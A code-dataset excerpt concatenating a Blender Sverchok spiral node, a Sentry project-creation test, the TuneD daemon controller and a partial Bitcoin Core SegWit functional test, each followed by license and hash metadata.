default=1, min=1, update=update_spiral)
flip: BoolProperty(
name="Flip Direction", description="Flip spiral direction",
default=False, update=update_spiral)
scale: FloatProperty(
name="Scale", description="Scale spiral vertices",
default=1.0, update=update_spiral)
height: FloatProperty(
name="Height", description="Height of the spiral along z",
default=0.0, update=update_spiral)
phase: FloatProperty(
name="Phase", description="Phase amount around spiral center",
default=0.0, update=SvAngleHelper.update_angle)
exponent: FloatProperty(
name="Exponent", description="Exponent attenuator",
default=2.0, update=update_spiral)
resolution: IntProperty(
name="Turn Resolution", description="Number of vertices in one turn in the spiral",
default=100, min=3, update=update_spiral)
separate: BoolProperty(
name="Separate arms",
description="Separate the spiral arms",
default=False, update=update_spiral)
updating: BoolProperty(default=False) # used for disabling update callback
def migrate_from(self, old_node):
''' Migration from old nodes '''
if old_node.bl_idname == "SvSpiralNode":
self.sType = old_node.stype
self.last_angle_units = AngleUnits.RADIANS
self.angle_units = AngleUnits.RADIANS
def sv_init(self, context):
self.width = 170
self.inputs.new('SvStringsSocket', "R").prop_name = 'eRadius'
self.inputs.new('SvStringsSocket', "r").prop_name = 'iRadius'
self.inputs.new('SvStringsSocket', "e").prop_name = 'exponent'
self.inputs.new('SvStringsSocket', "t").prop_name = 'turns'
self.inputs.new('SvStringsSocket', "n").prop_name = 'resolution'
self.inputs.new('SvStringsSocket', "s").prop_name = 'scale'
self.inputs.new('SvStringsSocket', "h").prop_name = 'height'
self.inputs.new('SvStringsSocket', "p").prop_name = 'phase'
self.inputs.new('SvStringsSocket', "a").prop_name = 'arms'
self.outputs.new('SvVerticesSocket', "Vertices")
self.outputs.new('SvStringsSocket', "Edges")
self.presets = "ARCHIMEDEAN"
def draw_buttons(self, context, layout):
layout.prop(self, 'presets')
layout.prop(self, 'sType', text="")
col = layout.column(align=True)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
row = col.row(align=True)
row.prop(self, 'normalize', expand=True)
row = col.row(align=True)
row.prop(self, 'flip', text="Flip", toggle=True)
row.prop(self, 'separate', text="Separate", toggle=True)
def draw_buttons_ext(self, context, layout):
self.draw_angle_units_buttons(context, layout)
def process(self):
outputs = self.outputs
# return if no outputs are connected
if not any(s.is_linked for s in outputs):
return
# input values lists (single or multi value)
inputs = self.inputs
input_R = inputs["R"].sv_get()[0] # list of exterior radii
input_r = inputs["r"].sv_get()[0] # list of interior radii
input_e = inputs["e"].sv_get()[0] # list of exponents
input_t = inputs["t"].sv_get()[0] # list of turns
input_n = inputs["n"].sv_get()[0] # list of curve resolutions
input_s = inputs["s"].sv_get()[0] # list of scales
input_h = inputs["h"].sv_get()[0] # list of heights (z)
input_p = inputs["p"].sv_get()[0] # list of phases
input_a = inputs["a"].sv_get()[0] # list of arms
# sanitize the input
input_R = list(map(lambda x: max(0.0, x), input_R))
input_r = list(map(lambda x: max(0.0, x), input_r))
input_t = list(map(lambda x: max(1, int(x)), input_t))
input_n = list(map(lambda x: max(3, int(x)), input_n))
input_a = list(map(lambda x: max(1, int(x)), input_a))
# extra parameters
f = self.flip # flip direction
parameters = match_long_repeat([input_R, input_r, input_e, input_t,
input_n, input_s, input_h, input_p, input_a])
# conversion factor from the current angle units to radians
au = self.radians_conversion_factor()
make_spiral = eval("make_" + self.sType.lower() + "_spiral")
verts_list = []
edges_list = []
for R, r, e, t, n, s, h, p, a in zip(*parameters):
p = p * au
arm_verts = []
arm_edges = []
for i in range(a): # generate each arm
pa = p + 2 * pi / a * i
settings = [R, r, e, t, n, s, h, pa, f] # spiral settings
verts, edges, norms = make_spiral(settings)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
normalize_spiral(verts, self.normalize == "ER", R, r, s)
if self.separate:
arm_verts.append(verts)
arm_edges.append(edges)
else: # join the arms
o = len(arm_verts)
edges = [[i1 + o, i2 + o] for (i1, i2) in edges]
arm_verts.extend(verts)
arm_edges.extend(edges)
verts_list.append(arm_verts)
edges_list.append(arm_edges)
self.outputs['Vertices'].sv_set(verts_list)
self.outputs['Edges'].sv_set(edges_list)
def register():
bpy.utils.register_class(SvSpiralNodeMK2)
def unregister():
bpy.utils.unregister_class(SvSpiralNodeMK2)
| gpl-3.0 | -9,002,781,532,965,027,000 | 32.879389 | 111 | 0.567437 | false |
simmetria/sentry | tests/sentry/web/frontend/projects/tests.py | 1 | 1710 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from sentry.constants import MEMBER_OWNER
from sentry.models import Project, Team
from sentry.testutils import fixture
from sentry.testutils import TestCase
logger = logging.getLogger(__name__)
class NewProjectTest(TestCase):
fixtures = ['tests/fixtures/views.json']
@fixture
def user(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('admin')
user.save()
return user
@fixture
def team(self):
return Team.objects.create(name='foo', slug='foo', owner=self.user)
def test_new_project(self):
path = reverse('sentry-new-team-project', args=[self.team.slug])
self.client.login(username='admin', password='admin')
# missing name
resp = self.client.post(path)
self.assertEquals(resp.status_code, 200)
# valid params
resp = self.client.post(path, {
'name': 'Test Project',
'slug': 'test',
})
self.assertNotEquals(resp.status_code, 200)
project = Project.objects.filter(name='Test Project')
self.assertTrue(project.exists())
project = project.get()
self.assertEquals(project.owner, self.user)
self.assertNotEquals(project.team, None)
member_set = list(project.team.member_set.all())
self.assertEquals(len(member_set), 1)
member = member_set[0]
self.assertEquals(member.user, self.user)
self.assertEquals(member.type, MEMBER_OWNER)
| bsd-3-clause | 2,186,302,857,400,867,300 | 27.5 | 96 | 0.649708 | false |
redhat-performance/tuned | tuned/daemon/controller.py | 1 | 8767 | from tuned import exports
import tuned.logs
import tuned.exceptions
from tuned.exceptions import TunedException
import threading
import tuned.consts as consts
from tuned.utils.commands import commands
__all__ = ["Controller"]
log = tuned.logs.get()
class TimerStore(object):
def __init__(self):
self._timers = dict()
self._timers_lock = threading.Lock()
def store_timer(self, token, timer):
with self._timers_lock:
self._timers[token] = timer
def drop_timer(self, token):
with self._timers_lock:
try:
timer = self._timers[token]
timer.cancel()
del self._timers[token]
except:
pass
def cancel_all(self):
with self._timers_lock:
for timer in self._timers.values():
timer.cancel()
self._timers.clear()
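# Minimal usage sketch of TimerStore (illustrative only, callback name hypothetical):
#
#   store = TimerStore()
#   timer = threading.Timer(30.0, abort_capture, args=["token-1"])
#   store.store_timer("token-1", timer)
#   timer.start()
#   ...
#   store.drop_timer("token-1")    # cancels the timer if it has not fired yet
#
# Controller.log_capture_start() below uses this exact pattern to abort log captures
# whose callers never call log_capture_finish() within the requested timeout.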
class Controller(tuned.exports.interfaces.ExportableInterface):
"""
Controller's purpose is to keep the program running, start/stop the tuning,
and export the controller interface (currently only over D-Bus).
"""
def __init__(self, daemon, global_config):
super(Controller, self).__init__()
self._daemon = daemon
self._global_config = global_config
self._terminate = threading.Event()
self._cmd = commands()
self._timer_store = TimerStore()
def run(self):
"""
Controller main loop. The call is blocking.
"""
log.info("starting controller")
res = self.start()
daemon = self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON)
if not res and daemon:
exports.start()
if daemon:
self._terminate.clear()
# we have to pass some timeout, otherwise signals will not work
while not self._cmd.wait(self._terminate, 10):
pass
log.info("terminating controller")
self.stop()
def terminate(self):
self._terminate.set()
@exports.signal("sbs")
def profile_changed(self, profile_name, result, errstr):
pass
# exports decorator checks the authorization (currently through polkit), caller is None if
# no authorization was performed (i.e. the call should process as authorized), string
# identifying caller (with DBus it's the caller bus name) if authorized and empty
# string if not authorized, caller must be the last argument
def _log_capture_abort(self, token):
tuned.logs.log_capture_finish(token)
self._timer_store.drop_timer(token)
@exports.export("ii", "s")
def log_capture_start(self, log_level, timeout, caller = None):
if caller == "":
return ""
token = tuned.logs.log_capture_start(log_level)
if token is None:
return ""
if timeout > 0:
timer = threading.Timer(timeout,
self._log_capture_abort, args = [token])
self._timer_store.store_timer(token, timer)
timer.start()
return "" if token is None else token
@exports.export("s", "s")
def log_capture_finish(self, token, caller = None):
if caller == "":
return ""
res = tuned.logs.log_capture_finish(token)
self._timer_store.drop_timer(token)
return "" if res is None else res
@exports.export("", "b")
def start(self, caller = None):
if caller == "":
return False
if self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON):
if self._daemon.is_running():
return True
elif not self._daemon.is_enabled():
return False
return self._daemon.start()
@exports.export("", "b")
def stop(self, caller = None):
if caller == "":
return False
if not self._daemon.is_running():
res = True
else:
res = self._daemon.stop()
self._timer_store.cancel_all()
return res
@exports.export("", "b")
def reload(self, caller = None):
if caller == "":
return False
if self._daemon.is_running():
stop_ok = self.stop()
if not stop_ok:
return False
try:
self._daemon.reload_profile_config()
except TunedException as e:
log.error("Failed to reload TuneD: %s" % e)
return False
return self.start()
def _switch_profile(self, profile_name, manual):
was_running = self._daemon.is_running()
msg = "OK"
success = True
reapply = False
try:
if was_running:
self._daemon.stop(profile_switch = True)
self._daemon.set_profile(profile_name, manual)
except tuned.exceptions.TunedException as e:
success = False
msg = str(e)
if was_running and self._daemon.profile.name == profile_name:
log.error("Failed to reapply profile '%s'. Did it change on disk and break?" % profile_name)
reapply = True
else:
log.error("Failed to apply profile '%s'" % profile_name)
finally:
if was_running:
if reapply:
log.warn("Applying previously applied (possibly out-dated) profile '%s'." % profile_name)
elif not success:
log.info("Applying previously applied profile.")
self._daemon.start()
return (success, msg)
@exports.export("s", "(bs)")
def switch_profile(self, profile_name, caller = None):
if caller == "":
return (False, "Unauthorized")
return self._switch_profile(profile_name, True)
@exports.export("", "(bs)")
def auto_profile(self, caller = None):
if caller == "":
return (False, "Unauthorized")
profile_name = self.recommend_profile()
return self._switch_profile(profile_name, False)
@exports.export("", "s")
def active_profile(self, caller = None):
if caller == "":
return ""
if self._daemon.profile is not None:
return self._daemon.profile.name
else:
return ""
@exports.export("", "(ss)")
def profile_mode(self, caller = None):
if caller == "":
return "unknown", "Unauthorized"
manual = self._daemon.manual
if manual is None:
# This means no profile is applied. Check the preset value.
try:
profile, manual = self._cmd.get_active_profile()
if manual is None:
manual = profile is not None
except TunedException as e:
mode = "unknown"
error = str(e)
return mode, error
mode = consts.ACTIVE_PROFILE_MANUAL if manual else consts.ACTIVE_PROFILE_AUTO
return mode, ""
@exports.export("", "s")
def post_loaded_profile(self, caller = None):
if caller == "":
return ""
return self._daemon.post_loaded_profile or ""
@exports.export("", "b")
def disable(self, caller = None):
if caller == "":
return False
if self._daemon.is_running():
self._daemon.stop()
if self._daemon.is_enabled():
self._daemon.set_all_profiles(None, True, None,
save_instantly=True)
return True
@exports.export("", "b")
def is_running(self, caller = None):
if caller == "":
return False
return self._daemon.is_running()
@exports.export("", "as")
def profiles(self, caller = None):
if caller == "":
return []
return self._daemon.profile_loader.profile_locator.get_known_names()
@exports.export("", "a(ss)")
def profiles2(self, caller = None):
if caller == "":
return []
return self._daemon.profile_loader.profile_locator.get_known_names_summary()
@exports.export("s", "(bsss)")
def profile_info(self, profile_name, caller = None):
if caller == "":
			return (False, "", "", "")
if profile_name is None or profile_name == "":
profile_name = self.active_profile()
return tuple(self._daemon.profile_loader.profile_locator.get_profile_attrs(profile_name, [consts.PROFILE_ATTR_SUMMARY, consts.PROFILE_ATTR_DESCRIPTION], [""]))
@exports.export("", "s")
def recommend_profile(self, caller = None):
if caller == "":
return ""
return self._daemon.profile_recommender.recommend()
@exports.export("", "b")
def verify_profile(self, caller = None):
if caller == "":
return False
return self._daemon.verify_profile(ignore_missing = False)
@exports.export("", "b")
def verify_profile_ignore_missing(self, caller = None):
if caller == "":
return False
return self._daemon.verify_profile(ignore_missing = True)
@exports.export("", "a{sa{ss}}")
def get_all_plugins(self, caller = None):
"""Return dictionary with accesible plugins
Return:
dictionary -- {plugin_name: {parameter_name: default_value}}
"""
if caller == "":
return False
plugins = {}
for plugin_class in self._daemon.get_all_plugins():
plugin_name = plugin_class.__module__.split(".")[-1].split("_", 1)[1]
conf_options = plugin_class._get_config_options()
plugins[plugin_name] = {}
for key, val in conf_options.items():
plugins[plugin_name][key] = str(val)
return plugins
@exports.export("s","s")
def get_plugin_documentation(self, plugin_name, caller = None):
"""Return docstring of plugin's class"""
if caller == "":
return False
return self._daemon.get_plugin_documentation(str(plugin_name))
@exports.export("s","a{ss}")
def get_plugin_hints(self, plugin_name, caller = None):
"""Return dictionary with plugin's parameters and their hints
Parameters:
plugin_name -- name of plugin
Return:
dictionary -- {parameter_name: hint}
"""
if caller == "":
return False
return self._daemon.get_plugin_hints(str(plugin_name))
| gpl-2.0 | 5,299,379,313,047,276,000 | 27.280645 | 161 | 0.671381 | false |
r8921039/bitcoin | test/functional/feature_segwit.py | 1 | 36451 | #!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the SegWit changeover logic."""
from decimal import Decimal
from io import BytesIO
from test_framework.address import (
key_to_p2pkh,
program_to_witness,
script_to_p2sh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from test_framework.blocktools import witness_script, send_to_witness
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut, FromHex, sha256, ToHex
from test_framework.script import CScript, OP_HASH160, OP_CHECKSIG, OP_0, hash160, OP_EQUAL, OP_DUP, OP_EQUALVERIFY, OP_1, OP_2, OP_CHECKMULTISIG, OP_TRUE, OP_DROP
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, connect_nodes, hex_str_to_bytes, sync_blocks, try_rpc
NODE_0 = 0
NODE_2 = 2
WIT_V0 = 0
WIT_V1 = 1
def getutxo(txid):
utxo = {}
utxo["vout"] = 0
utxo["txid"] = txid
return utxo
def find_spendable_utxo(node, min_value):
for utxo in node.listunspent(query_options={'minimumAmount': min_value}):
if utxo['spendable']:
return utxo
raise AssertionError("Unspent output equal or higher than %s not found" % min_value)
txs_mined = {} # txindex from txid to blockhash
class SegWitTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
# This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
self.extra_args = [
[
"-rpcserialversion=0",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
[
"-blockversion=4",
"-rpcserialversion=1",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
[
"-blockversion=536870915",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
connect_nodes(self.nodes[0], 2)
self.sync_all()
def success_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 2)
sync_blocks(self.nodes)
def skip_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 1)
sync_blocks(self.nodes)
def fail_accept(self, node, error_msg, txid, sign, redeem_script=""):
assert_raises_rpc_error(-26, error_msg, send_to_witness, use_p2wsh=1, node=node, utxo=getutxo(txid), pubkey=self.pubkey[0], encode_p2sh=False, amount=Decimal("49.998"), sign=sign, insert_redeem_script=redeem_script)
def run_test(self):
self.nodes[0].generate(161) # block 161
self.log.info("Verify sigops are counted in GBT with pre-BIP141 rules before the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] == 1000000
assert 'weightlimit' not in tmpl
assert tmpl['sigoplimit'] == 20000
assert tmpl['transactions'][0]['hash'] == txid
assert tmpl['transactions'][0]['sigops'] == 2
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] == 1000000
assert 'weightlimit' not in tmpl
assert tmpl['sigoplimit'] == 20000
assert tmpl['transactions'][0]['hash'] == txid
assert tmpl['transactions'][0]['sigops'] == 2
self.nodes[0].generate(1) # block 162
balance_presetup = self.nodes[0].getbalance()
self.pubkey = []
p2sh_ids = [] # p2sh_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE embedded in p2sh
wit_ids = [] # wit_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE via bare witness
for i in range(3):
newaddress = self.nodes[i].getnewaddress()
self.pubkey.append(self.nodes[i].getaddressinfo(newaddress)["pubkey"])
multiscript = CScript([OP_1, hex_str_to_bytes(self.pubkey[-1]), OP_1, OP_CHECKMULTISIG])
p2sh_ms_addr = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]], '', 'p2sh-segwit')['address']
bip173_ms_addr = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]], '', 'bech32')['address']
assert_equal(p2sh_ms_addr, script_to_p2sh_p2wsh(multiscript))
assert_equal(bip173_ms_addr, script_to_p2wsh(multiscript))
p2sh_ids.append([])
wit_ids.append([])
for v in range(2):
p2sh_ids[i].append([])
wit_ids[i].append([])
for i in range(5):
for n in range(3):
for v in range(2):
wit_ids[n][v].append(send_to_witness(v, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[n], False, Decimal("49.999")))
p2sh_ids[n][v].append(send_to_witness(v, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[n], True, Decimal("49.999")))
self.nodes[0].generate(1) # block 163
sync_blocks(self.nodes)
# Make sure all nodes recognize the transactions as theirs
assert_equal(self.nodes[0].getbalance(), balance_presetup - 60 * 50 + 20 * Decimal("49.999") + 50)
assert_equal(self.nodes[1].getbalance(), 20 * Decimal("49.999"))
assert_equal(self.nodes[2].getbalance(), 20 * Decimal("49.999"))
self.nodes[0].generate(260) # block 423
sync_blocks(self.nodes)
self.log.info("Verify witness txs are skipped for mining before the fork")
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][0], True) # block 424
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][0], True) # block 425
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][0], True) # block 426
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][0], True) # block 427
self.log.info("Verify unsigned p2sh witness txs without a redeem script are invalid")
self.fail_accept(self.nodes[2], "mandatory-script-verify-flag", p2sh_ids[NODE_2][WIT_V0][1], False)
self.fail_accept(self.nodes[2], "mandatory-script-verify-flag", p2sh_ids[NODE_2][WIT_V1][1], False)
self.nodes[2].generate(4) # blocks 428-431
self.log.info("Verify previous witness txs skipped for mining can now be mined")
assert_equal(len(self.nodes[2].getrawmempool()), 4)
blockhash = self.nodes[2].generate(1)[0] # block 432 (first block with new rules; 432 = 144 * 3)
sync_blocks(self.nodes)
assert_equal(len(self.nodes[2].getrawmempool()), 0)
segwit_tx_list = self.nodes[2].getblock(blockhash)["tx"]
assert_equal(len(segwit_tx_list), 5)
self.log.info("Verify default node can't accept txs with missing witness")
# unsigned, no scriptsig
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", wit_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", wit_ids[NODE_0][WIT_V1][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V1][0], False)
# unsigned with redeem script
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V0][0], False, witness_script(False, self.pubkey[0]))
self.fail_accept(self.nodes[0], "mandatory-script-verify-flag", p2sh_ids[NODE_0][WIT_V1][0], False, witness_script(True, self.pubkey[0]))
self.log.info("Verify block and transaction serialization rpcs return differing serializations depending on rpc serialization flag")
assert self.nodes[2].getblock(blockhash, False) != self.nodes[0].getblock(blockhash, False)
assert self.nodes[1].getblock(blockhash, False) == self.nodes[2].getblock(blockhash, False)
for tx_id in segwit_tx_list:
tx = FromHex(CTransaction(), self.nodes[2].gettransaction(tx_id)["hex"])
assert self.nodes[2].getrawtransaction(tx_id, False, blockhash) != self.nodes[0].getrawtransaction(tx_id, False, blockhash)
assert self.nodes[1].getrawtransaction(tx_id, False, blockhash) == self.nodes[2].getrawtransaction(tx_id, False, blockhash)
assert self.nodes[0].getrawtransaction(tx_id, False, blockhash) != self.nodes[2].gettransaction(tx_id)["hex"]
assert self.nodes[1].getrawtransaction(tx_id, False, blockhash) == self.nodes[2].gettransaction(tx_id)["hex"]
assert self.nodes[0].getrawtransaction(tx_id, False, blockhash) == tx.serialize_without_witness().hex()
self.log.info("Verify witness txs without witness data are invalid after the fork")
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program hash mismatch) (code 64)', wit_ids[NODE_2][WIT_V0][2], sign=False)
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program was passed an empty witness) (code 64)', wit_ids[NODE_2][WIT_V1][2], sign=False)
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program hash mismatch) (code 64)', p2sh_ids[NODE_2][WIT_V0][2], sign=False, redeem_script=witness_script(False, self.pubkey[2]))
self.fail_accept(self.nodes[2], 'non-mandatory-script-verify-flag (Witness program was passed an empty witness) (code 64)', p2sh_ids[NODE_2][WIT_V1][2], sign=False, redeem_script=witness_script(True, self.pubkey[2]))
self.log.info("Verify default node can now use witness txs")
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) # block 432
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) # block 433
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) # block 434
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) # block 435
self.log.info("Verify sigops are counted in GBT with BIP141 rules after the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] >= 3999577 # actual maximum size is lower due to minimum mandatory non-witness data
assert tmpl['weightlimit'] == 4000000
assert tmpl['sigoplimit'] == 80000
assert tmpl['transactions'][0]['txid'] == txid
assert tmpl['transactions'][0]['sigops'] == 8
self.nodes[0].generate(1) # Mine a block to clear the gbt cache
self.log.info("Non-segwit miners are able to use GBT response after activation.")
# Create a 3-tx chain: tx1 (non-segwit input, paying to a segwit output) ->
# tx2 (segwit input, paying to a non-segwit output) ->
# tx3 (non-segwit input, paying to a non-segwit output).
# tx1 is allowed to appear in the block, but no others.
txid1 = send_to_witness(1, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[0], False, Decimal("49.996"))
hex_tx = self.nodes[0].gettransaction(txid)['hex']
tx = FromHex(CTransaction(), hex_tx)
assert tx.wit.is_null() # This should not be a segwit input
assert txid1 in self.nodes[0].getrawmempool()
# Now create tx2, which will spend from txid1.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(txid1, 16), 0), b''))
tx.vout.append(CTxOut(int(49.99 * COIN), CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx2_hex = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))['hex']
txid2 = self.nodes[0].sendrawtransaction(tx2_hex)
tx = FromHex(CTransaction(), tx2_hex)
assert not tx.wit.is_null()
# Now create tx3, which will spend from txid2
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int(txid2, 16), 0), b""))
tx.vout.append(CTxOut(int(49.95 * COIN), CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))) # Huge fee
tx.calc_sha256()
txid3 = self.nodes[0].sendrawtransaction(ToHex(tx))
assert tx.wit.is_null()
assert txid3 in self.nodes[0].getrawmempool()
# Check that getblocktemplate includes all transactions.
template = self.nodes[0].getblocktemplate({"rules": ["segwit"]})
template_txids = [t['txid'] for t in template['transactions']]
assert txid1 in template_txids
assert txid2 in template_txids
assert txid3 in template_txids
# Check that wtxid is properly reported in mempool entry
assert_equal(int(self.nodes[0].getmempoolentry(txid3)["wtxid"], 16), tx.calc_sha256(True))
# Mine a block to clear the gbt cache again.
self.nodes[0].generate(1)
self.log.info("Verify behaviour of importaddress and listunspent")
# Some public keys to be used later
pubkeys = [
"0363D44AABD0F1699138239DF2F042C3282C0671CC7A76826A55C8203D90E39242", # cPiM8Ub4heR9NBYmgVzJQiUH1if44GSBGiqaeJySuL2BKxubvgwb
"02D3E626B3E616FC8662B489C123349FECBFC611E778E5BE739B257EAE4721E5BF", # cPpAdHaD6VoYbW78kveN2bsvb45Q7G5PhaPApVUGwvF8VQ9brD97
"04A47F2CBCEFFA7B9BCDA184E7D5668D3DA6F9079AD41E422FA5FD7B2D458F2538A62F5BD8EC85C2477F39650BD391EA6250207065B2A81DA8B009FC891E898F0E", # 91zqCU5B9sdWxzMt1ca3VzbtVm2YM6Hi5Rxn4UDtxEaN9C9nzXV
"02A47F2CBCEFFA7B9BCDA184E7D5668D3DA6F9079AD41E422FA5FD7B2D458F2538", # cPQFjcVRpAUBG8BA9hzr2yEzHwKoMgLkJZBBtK9vJnvGJgMjzTbd
"036722F784214129FEB9E8129D626324F3F6716555B603FFE8300BBCB882151228", # cQGtcm34xiLjB1v7bkRa4V3aAc9tS2UTuBZ1UnZGeSeNy627fN66
"0266A8396EE936BF6D99D17920DB21C6C7B1AB14C639D5CD72B300297E416FD2EC", # cTW5mR5M45vHxXkeChZdtSPozrFwFgmEvTNnanCW6wrqwaCZ1X7K
"0450A38BD7F0AC212FEBA77354A9B036A32E0F7C81FC4E0C5ADCA7C549C4505D2522458C2D9AE3CEFD684E039194B72C8A10F9CB9D4764AB26FCC2718D421D3B84", # 92h2XPssjBpsJN5CqSP7v9a7cf2kgDunBC6PDFwJHMACM1rrVBJ
]
# Import a compressed key and an uncompressed key, generate some multisig addresses
self.nodes[0].importprivkey("92e6XLo5jVAVwrQKPNTs93oQco8f8sDNBcpv73Dsrs397fQtFQn")
uncompressed_spendable_address = ["mvozP4UwyGD2mGZU4D2eMvMLPB9WkMmMQu"]
self.nodes[0].importprivkey("cNC8eQ5dg3mFAVePDX4ddmPYpPbw41r9bm2jd1nLJT77e6RrzTRR")
compressed_spendable_address = ["mmWQubrDomqpgSYekvsU7HWEVjLFHAakLe"]
assert not self.nodes[0].getaddressinfo(uncompressed_spendable_address[0])['iscompressed']
assert self.nodes[0].getaddressinfo(compressed_spendable_address[0])['iscompressed']
self.nodes[0].importpubkey(pubkeys[0])
compressed_solvable_address = [key_to_p2pkh(pubkeys[0])]
self.nodes[0].importpubkey(pubkeys[1])
compressed_solvable_address.append(key_to_p2pkh(pubkeys[1]))
self.nodes[0].importpubkey(pubkeys[2])
uncompressed_solvable_address = [key_to_p2pkh(pubkeys[2])]
spendable_anytime = [] # These outputs should be seen anytime after importprivkey and addmultisigaddress
spendable_after_importaddress = [] # These outputs should be seen after importaddress
solvable_after_importaddress = [] # These outputs should be seen after importaddress but not spendable
unsolvable_after_importaddress = [] # These outputs should be unsolvable after importaddress
solvable_anytime = [] # These outputs should be solvable after importpubkey
unseen_anytime = [] # These outputs should never be seen
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], uncompressed_spendable_address[0]])['address'])
compressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], uncompressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_solvable_address[0], compressed_solvable_address[1]])['address'])
# Test multisig_without_privkey
# We have 2 public keys without private keys, use addmultisigaddress to add to wallet.
# Money sent to P2SH of multisig of this should only be seen after importaddress with the BASE58 P2SH address.
multisig_without_privkey_address = self.nodes[0].addmultisigaddress(2, [pubkeys[3], pubkeys[4]])['address']
script = CScript([OP_2, hex_str_to_bytes(pubkeys[3]), hex_str_to_bytes(pubkeys[4]), OP_2, OP_CHECKMULTISIG])
solvable_after_importaddress.append(CScript([OP_HASH160, hash160(script), OP_EQUAL]))
for i in compressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# p2sh multisig with compressed keys should always be spendable
spendable_anytime.extend([p2sh])
# bare multisig can be watched and signed, but is not treated as ours
solvable_after_importaddress.extend([bare])
# P2WSH and P2SH(P2WSH) multisig with compressed keys are spendable after direct importaddress
spendable_after_importaddress.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with compressed keys should always be spendable
spendable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK, P2SH_P2PKH with compressed keys are spendable after direct importaddress
spendable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
